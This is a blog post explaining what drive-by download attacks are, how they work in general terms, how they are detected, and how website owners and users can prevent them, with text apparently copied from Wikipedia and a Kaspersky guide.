How A Drive by Download Attack


Warning! : According to the request from readers of the blog [LAAHB] to make articles in English, then on this occasion the admin [LAAHB] made this article in English, so if there are still some readers who don't understand, please translate it using google translate that has been we provide! thank you!

Best regards, Team Learning All About Hacks Blog — [LAAHB]

Learning All About Hack BlogHow A Drive-by Download Attack — Drive by download attacks specifically refer to malicious programs that install to your devices — without your consent. This also includes unintentional downloads of any files or bundled software onto a computer device.

Masked in all corners of the web, these attacks cause even perfectly legitimate sites to spread this threat.

variantsHere are the two main variants of Drive by Download attacks:
  • Non-malicious potentially unwanted programs or applications (PUPs/PUAs).
  • Malware-loaded attacks.
While the former is clean and safe, it may be adware at its worst. Cybersecurity experts use the latter as their drive by download definition.

What is a Drive by Download Attack?

A drive-by download attack refers to the unintentional download of malicious code to your computer or mobile device that leaves you open to a cyberattack. You don't have to click on anything, press download, or open a malicious email attachment to become infected.

A drive-by download can take advantage of an app, operating system, or web browser that contains security flaws due to unsuccessful updates or lack of updates. Unlike many other types of cyberattack, a drive-by doesn't rely on the user to do anything to actively enable the attack.

Drive-by download means two things, each concerning the unintended download of computer software from the Internet:

  1. Downloads which a person has authorized but without understanding the consequences (e.g. downloads which install an unknown or counterfeit executable program, ActiveX component, or Java applet).
  2. Any download that happens without a person's knowledge, often a computer virus, spyware, malware, or crimeware.
Drive-by downloads may happen when visiting a website, opening an e-mail attachment or clicking a link, or clicking on a deceptive pop-up window: by clicking on the window in the mistaken belief that, for example, an error report from the computer's operating system itself is being acknowledged or a seemingly innocuous advertisement pop-up is being dismissed.

In such cases, the "supplier" may claim that the user "consented" to the download, although the user was in fact unaware of having started an unwanted or malicious software download.

Similarly if a person is visiting a site with malicious content, the person may become victim to a drive-by download attack.

That is, the malicious content may be able to exploit vulnerabilities in the browser or plugins to run malicious code without the user's knowledge.

A drive-by install (or installation) is a similar event. It refers to installation rather than download (though sometimes the two terms are used interchangeably).

When creating a drive-by download, an attacker must first create their malicious content to perform the attack. With the rise in exploit packs that contain the vulnerabilities needed to carry out drive-by download attacks, the skill level needed to perform this attack has been reduced.

The next step is to host the malicious content that the attacker wishes to distribute. One option is for the attacker to host the malicious content on their own server.

However, because of the difficulty in directing users to a new page, it may also be hosted on a compromised legitimate website, or a legitimate website unknowingly distributing the attackers content through a third party service (e.g. an advertisement).

When the content is loaded by the client, the attacker will analyze the fingerprint of the client in order to tailor the code to exploit vulnerabilities specific to that client.

Finally, the attacker exploits the necessary vulnerabilities to launch the drive-by download attack. Drive-by downloads usually use one of two strategies. The first strategy is exploiting API calls for various plugins.

For example, the DownloadAndInstall API of the Sina ActiveX component did not properly check its parameters and allowed the downloading and execution of arbitrary files from the internet.

The second strategy involves writing shellcode to memory, and then exploiting vulnerabilities in the web browser or plugin to divert the control flow of the program to the shell code.

After the shellcode has been executed, the attacker can perform further malicious activities. This often involves downloading and installing malware, but can be anything, including stealing information to send back to the attacker.

The attacker may also take measures to prevent detection throughout the attack. One method is to rely on the obfuscation of the malicious code. This can be done through the use of IFrames.

Another method is to encrypt the malicious code to prevent detection. Generally the attacker encrypts the malicious code into a ciphertext, then includes the decryption method after the ciphertext.

Detection of drive-by download attacks is an active area of research. Some methods of detection involve anomaly detection, which tracks for state changes on a user's computer system while the user visits a webpage.

This involves monitoring the user's computer system for anomalous changes when a web page is rendered. Other methods of detection include detecting when malicious code (shellcode) is written to memory by an attacker's exploit.

Another detection method is to make run-time environments that allow JavaScript code to run and track its behavior while it runs. Other detection methods include examining contents of HTML pages to identify features that can be used to identify malicious web pages, and using characteristics of web servers to determine if a page is malicious.

Some antivirus tools use static signatures to match patterns of malicious scripts, although these are not very effective because of obfuscation techniques. Detection is also possible by using low-interaction or high-interaction honeyclients.

Drive-by downloads can also be prevented from occurring by using script-blockers such as NoScript, which can easily be added into browsers such as Firefox. Using such a script-blocker, the user can disable all the scripts in a given webpage, and then selectively re-enable individual scripts on a one-by-one basis in order to determine which ones are truly necessary for webpage functionality.

In this way, a whitelist of acceptable scripts can quickly be developed, which in turn facilitates convenient, safe, and efficient browsing of other websites. Such script-blocking also saves time and bandwidth (hence money) for the user, because scripts that load advertising (especially targeted ads) and invade the user's privacy (via tracking and profiling) no longer constitute a personal drain on the user and his/her resources.


Drive by downloads are designed to breach your device for one or more of the following:
  1. Hijack your device — to build a botnet, infect other devices, or breach yours further.
  2. Spy on your activity — to steal your online credentials, financial info, or identity.
  3. Ruin data or disable your device — to simply cause trouble or personally harm you.
Without proper security software or fixes for your vulnerabilities, you could become a victim of a drive by download attack.

How Do Drive by Download Attacks Work?

If you’ve ever asked yourself, “what is a drive by download attack?” you’re more aware than most. Since they infiltrate so quietly even on “safe sites,” most people have no clue how they got infected.

There are two main ways malicious drive by downloads get into your devices:
  1. Authorized without knowing full implications: You take an action leading to infection, such as clicking a link on a deceptive fake security alert or downloading a Trojan.
  2. Fully unauthorized without any notification: You visit a site and get infected without any prompts or further action. These downloads can be anywhere, even legitimate sites.
Knowing exactly what is drive by download is as important as knowing how to spot bait for an attack. Let’s unpack each one of these methods to help you see possible red flags.

Authorized Downloads with Hidden Payloads

Authorized drive by downloads are streamlined and may even be spotted before the attack:
  • Hacker creates a vector for malware delivery — online message, ads, legitimate program downloads.
  • You interact with the vector — clicking a deceptive link, downloading software, etc.
  • Malware installs on your device — by failing to opt-out of extra software or arriving at a malware-infested site.
  • Hacker successfully enters your device — malware takes unwanted control of your data.
Software or websites may seem innocuous, but they are corrupted by malware. In fact, one of the greatest dangers is the ease of attracting visitors to sites or apps that seem innocent.

For example, you might get a link emailed to you or a post on your social media feed. It is masked to look as though it was sent from sources you trust. This social engineering tactic is used to entice you to click and open. Once the website is open, the drive-by download installs itself on your computer or mobile device. This tactic is used to entice you to click and open. Once the website is open, the drive-by download installs itself on your computer or mobile device.

Bundleware is a popular “authorized” method, using secondary programs attached to your actual desired program download. Sometimes called barnacles, these potentially unwanted programs/applications (PUPs/PUAs) can conceal malware or be malware themselves. You’ll find this software usually as an opt-out choice when downloading free software or shareware.

Phishing can also be used to bait you into a drive-by download. Popups or fraudulent online messages pose as organizations you know and trust. You might be seeing a fake security breach notification from your web browser, or a fake data breach email from your bank. These are meant to scare you into clicking a link or downloading an attachment — and getting infected.

Unauthorized Downloads Without Your Knowledge

An unauthorized drive by download works in a simple way despite having multiple phases:
  1. Hacker compromises a web page — plugging a malicious component into a security flaw.
  2. You trigger the component — visiting the page and it finds your device’s security gaps.
  3. The component downloads malware to your device — via your exploited security.
  4. Malware does its job — letting the hacker disrupt, control, or steal from your device.
As noted above, unauthorized malicious code is distributed directly by compromised websites. However, the code is placed there by hackers. Their methods rely on natural flaws of digital technology, as well as unsafe security practices.

Exploit kits are the software used to compromise vulnerable web servers and your devices. These kits identify software vulnerabilities on machines and web browsers to determine which systems are easy to obtain. Exploit kits often use small pieces of code designed to slip past simple defenses and go largely unnoticed. The code is kept simple to focus on one job: to contact another computer to introduce the rest of the code it needs to access a mobile device or computer.

Security vulnerabilities discovered by exploit kits are unavoidable in the digital age. No software or hardware can ever be made perfect. Just like a building can be infiltrated with careful study and planning, so too can any software, network, or other digital infrastructure. Vulnerabilities come in a few common forms:
  • Zero-day exploits: Security flaws without any known fixes or patches.
  • Known exploits: Security issues that have known-but-uninstalled fixes.
Zero-day exploits are hard to avoid, but known issues are manipulated purely due to poor cybersecurity practices. If endpoint users and web admins fail to update all their software in a timely fashion, they will delay vital security updates as well — and this is what hackers rely on.

Drive by downloads are by far one of the harder threats to prevent. Without proper attention to detail and strong security at all touchpoints, web activity becomes far more hazardous.

How to Avoid Drive by Download Attacks

As with many aspects of cyber safety, the best defense is caution. You should never take your security for granted. Here at Kaspersky, we’ve compiled some of the best guidelines on how you can avoid downloading malicious code.

How Website Owners Can Prevent Drive by Downloads

As a website owner, you are the first line of defense between hackers that target your users. To give yourself and your users peace-of-mind, strengthen your infrastructure with these tips:
  1. Keep all website components up to date. This includes any themes, addons, plugins, or any other infrastructure. Each update likely has new security fixes to keep hackers out.
  2. Remove any outdated or unsupported components of your website. Without regular security patches, old software is perfect for frauds to study and exploit.
  3. Use strong passwords and usernames for your admin accounts. Brute force attacks give hackers an almost instant break-in for default passwords, or weak ones like “password1234.” Use a password generator alongside a password manager to stay safe.
  4. Install protective web security software into your site. Monitoring software will help keep watch for any malicious changes to your site’s backend code.
  5. Consider how your advertisement use might affect users. Advertisements are a popular vector for drive by downloads. Be sure your users aren’t getting recommended suspect advertisements.

7 Tips for Endpoint Users

As a user, you’ll have to rely more on the various security features offered in your software. You can follow these tips to prepare yourself and your software against a drive by download attack:
  1. Only use your computer’s admin account for program installations. Admin privileges are necessary for drive by downloads to install without your consent. Since this setting comes default on your main account, use a secondary non-admin account for daily use.
  2. Keep your web browser and operating system up to date. New patches help seal gaps in their defenses where drive-by-download code could burrow in. Do not wait or delay — install these updates as soon as they release.
  3. Be wary of keeping too many unnecessary programs and apps. The more plug-ins you have on your device, the more susceptible you are to infection. Only keep the software you trust and use often. Also, remove any older apps that no longer receive updates.
  4. Use an internet security software solution on all your devices. Products like Kaspersky Security Cloud automatically keep your malware definitions up-to-date to spot the latest threats. They also can scan websites proactively to block known compromised sites.
  5. Always avoid websites that may contain malicious code. Sites that offer file-sharing or mature content are common points of infection. Only visit mainstream sites you normally use or at least well-established sites to improve your chances of staying clean.
  6. Carefully read and examine security popups on the web before clicking. Scammers use deceptive popup ads on desktop and mobile browsers that look like legitimate alerts. To avoid being linked to an attack site, watch for typos, odd grammar, and grainy images.
  7. Use an ad-blocker. Drive-by download attacks often use online ads to upload infections. Using an ad blocker can help reduce your exposure to this type of attack.
'